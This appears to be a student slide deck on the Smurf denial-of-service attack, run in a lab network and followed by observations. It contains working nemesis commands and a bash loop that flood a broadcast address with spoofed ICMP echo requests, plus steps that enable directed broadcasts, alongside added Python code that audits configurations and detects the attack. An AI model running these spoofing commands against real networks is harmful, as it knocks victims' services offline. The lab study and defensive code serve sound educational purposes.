Smurf Attack
Farhan Sajjad
Outline
Smurf Attack
  What is a Smurf Attack?
  How is it Engineered?
Project 1
  Test Environment
  Conducting the Attack
  Results and Observations
References
Questions?
What is a Smurf Attack?
Denial of Service Attack using spoofed broadcast ping messages.
How is it Engineered?
Essentially, by “spoofing” a broadcasted ICMP Echo request with the victim’s IP address as the sender
The ICMP Header
Sample Spoof
root@jotilMove# nemesis icmp -v -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 08:00:27:29:4C:F0
ICMP Packet Injection -=- The NEMESIS Project Version 1.4 (Build 26)
[MAC] 08:00:27:29:4C:F0 > FF:FF:FF:FF:FF:FF
[Ethernet type] IP (0x0800)
[IP] 192.168.0.5 > 192.168.0.255
[IP ID] 3121
[IP Proto] ICMP (1)
[IP TTL] 255
[IP TOS] 0x00
[IP Frag offset] 0x0000
[IP Frag flags]
[ICMP Type] Echo Request
[ICMP Code] Echo Request
[ICMP ID] 57730
[ICMP Seq number] 8233
Wrote 42 byte ICMP packet through linktype DLT_EN10MB.
ICMP Packet Injected
The Test Environment
The Test Environment (continued)
All the Linux machines had Wireshark installed on them
The attacker had Nemesis installed on it, to generate spoofed IP packets
The victim had an HTTP server on it, to check its availability
Had to turn on IP directed broadcasts (that is, undo the "no ip directed-broadcast" protection)
Linux OS:
root@jotilMove# echo "0" | cat > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
Cisco IOS:
RouterC(config)#int f0/0
RouterC(config-if)#ip directed-broadcast
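
The two settings above are exactly what turns a network into a usable amplifier, so they are worth auditing for. The following is an added example, not part of the original slides: it reports router interfaces that enable `ip directed-broadcast` and Linux hosts that answer broadcast pings. The function names and the sample running-config are constructed for illustration.

```python
import re

SYSCTL = "/proc/sys/net/ipv4/icmp_echo_ignore_broadcasts"

def host_answers_broadcast_ping(path=SYSCTL):
    """True when the Linux host replies to broadcast echo requests (value 0)."""
    with open(path) as fh:
        return fh.read().strip() == "0"

def audit_ios_config(config_text):
    """Return the interfaces whose stanza enables `ip directed-broadcast`."""
    flagged, current = [], None
    for raw in config_text.splitlines():
        line = raw.rstrip()
        match = re.match(r"interface\s+(\S+)", line)
        if match:
            current = match.group(1)
        elif line and not line[0].isspace() and line != "!":
            current = None  # another top-level command ends the stanza
        elif current and line.strip().startswith("ip directed-broadcast"):
            flagged.append(current)  # "no ip directed-broadcast" does not match
    return flagged

# Constructed running-config excerpt (not taken from the slides).
SAMPLE_CONFIG = """\
interface FastEthernet0/0
 ip address 192.168.0.1 255.255.255.0
 ip directed-broadcast
!
interface FastEthernet0/1
 ip address 10.0.0.1 255.255.255.0
 no ip directed-broadcast
!
router rip
 network 192.168.0.0
"""

if __name__ == "__main__":
    print("amplifier interfaces:", audit_ios_config(SAMPLE_CONFIG))
    try:
        print("host answers broadcast ping:", host_answers_broadcast_ping())
    except OSError:
        print("sysctl not readable on this system")
```

Applying `no ip directed-broadcast` to a flagged interface and writing `1` to `icmp_echo_ignore_broadcasts` clears both findings.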
Conducting the Attack
Created a small payload file of size 1472 bytes
Ran a small script at the attacking machine, which looped to send spoofed ICMP packets
#!/bin/bash
i=10000
while test $i != 0
do
  nemesis icmp -i 8 -c 0 -S 192.168.0.5 -D 192.168.0.255 -H 00:06:29:DF:2A:DA -P payload_file
  echo "$i"
  i=`expr $i - 1`
done
Results
The Attacker’s Screenshot
The Victim’s Screenshot During Attack
The Victim’s Screenshot After Attack
The Observer’s Screenshot
root@hpgcpc06:/home/farhan# time wget 192.168.0.5
--2009-11-13 20:49:45-- http://192.168.0.5/
Connecting to 192.168.0.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177 [text/html]
Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:49:45 (15.1 MB/s) - `index.html' saved [177/177]
real 0m0.008s
user 0m0.004s
sys 0m0.000s

root@hpgcpc06:/home/farhan# time wget 192.168.0.5
--2009-11-13 20:50:03-- http://192.168.0.5/
Connecting to 192.168.0.5:80... failed: Connection timed out.
Retrying....
--2009-11-13 20:59:36-- (try: 4) http://192.168.0.5/
Connecting to 192.168.0.5:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 177 [text/html]
Saving to: `index.html'
100%[======================================>] 177 --.-K/s in 0s
2009-11-13 20:59:36 (18.1 MB/s) - `index.html' saved [177/177]
real 9m33.041s
user 0m0.008s
sys 0m0.000s
Observations
The number of participating nodes is crucial to the effectiveness of the attack
The attack hardly affected the CPU or memory utilization of the victim; however, its network resources were overwhelmed and its services were unreachable
Networked devices made after 1998 have IP directed broadcasts turned off, so it is difficult to conduct such attacks; however, Smurf amplifiers exist!
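
Because the victim's CPU and memory stay quiet, the signal to watch for is on the wire: echo requests addressed to a broadcast address, and echo replies arriving from many hosts for a ping the target never sent. The following is an added example, not part of the original slides, that applies both checks to a list of decoded ICMP records. The record layout, thresholds and sample capture are constructed; only the addresses and ICMP ID/sequence values are reused from the slides.

```python
import ipaddress
from collections import defaultdict

ECHO_REPLY, ECHO_REQUEST = 0, 8  # ICMP type values

def detect_smurf(packets, local_net, min_reflectors=3, window=1.0):
    """packets: iterable of (time_s, src, dst, icmp_type, icmp_id, icmp_seq)."""
    net = ipaddress.ip_network(local_net)
    broadcast = {str(net.broadcast_address), "255.255.255.255"}
    solicited = set()                # (requester, id, seq) of unicast pings
    unsolicited = defaultdict(list)  # target -> [(time, reflector)]
    flagged, alerts = set(), []
    for ts, src, dst, typ, ident, seq in packets:
        if typ == ECHO_REQUEST:
            if dst in broadcast:
                # Never treated as solicited: the source address may be forged.
                alerts.append(("broadcast-echo-request", src, dst))
            else:
                solicited.add((src, ident, seq))
        elif typ == ECHO_REPLY and (dst, ident, seq) not in solicited:
            hits = unsolicited[dst]
            hits.append((ts, src))
            recent = {s for t, s in hits if ts - t <= window}
            if len(recent) >= min_reflectors and dst not in flagged:
                flagged.add(dst)
                alerts.append(("reflected-echo-flood", dst, len(recent)))
    return alerts

# Constructed sample capture (not the Wireshark traces from the slides).
SAMPLE = [
    (0.00, "192.168.0.7", "192.168.0.9", ECHO_REQUEST, 100, 1),  # ordinary ping
    (0.01, "192.168.0.9", "192.168.0.7", ECHO_REPLY, 100, 1),
    (0.10, "192.168.0.5", "192.168.0.255", ECHO_REQUEST, 57730, 8233),
    (0.11, "192.168.0.10", "192.168.0.5", ECHO_REPLY, 57730, 8233),
    (0.11, "192.168.0.11", "192.168.0.5", ECHO_REPLY, 57730, 8233),
    (0.12, "192.168.0.12", "192.168.0.5", ECHO_REPLY, 57730, 8233),
]

if __name__ == "__main__":
    for alert in detect_smurf(SAMPLE, "192.168.0.0/24"):
        print(alert)
```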
Questions?
Thank You!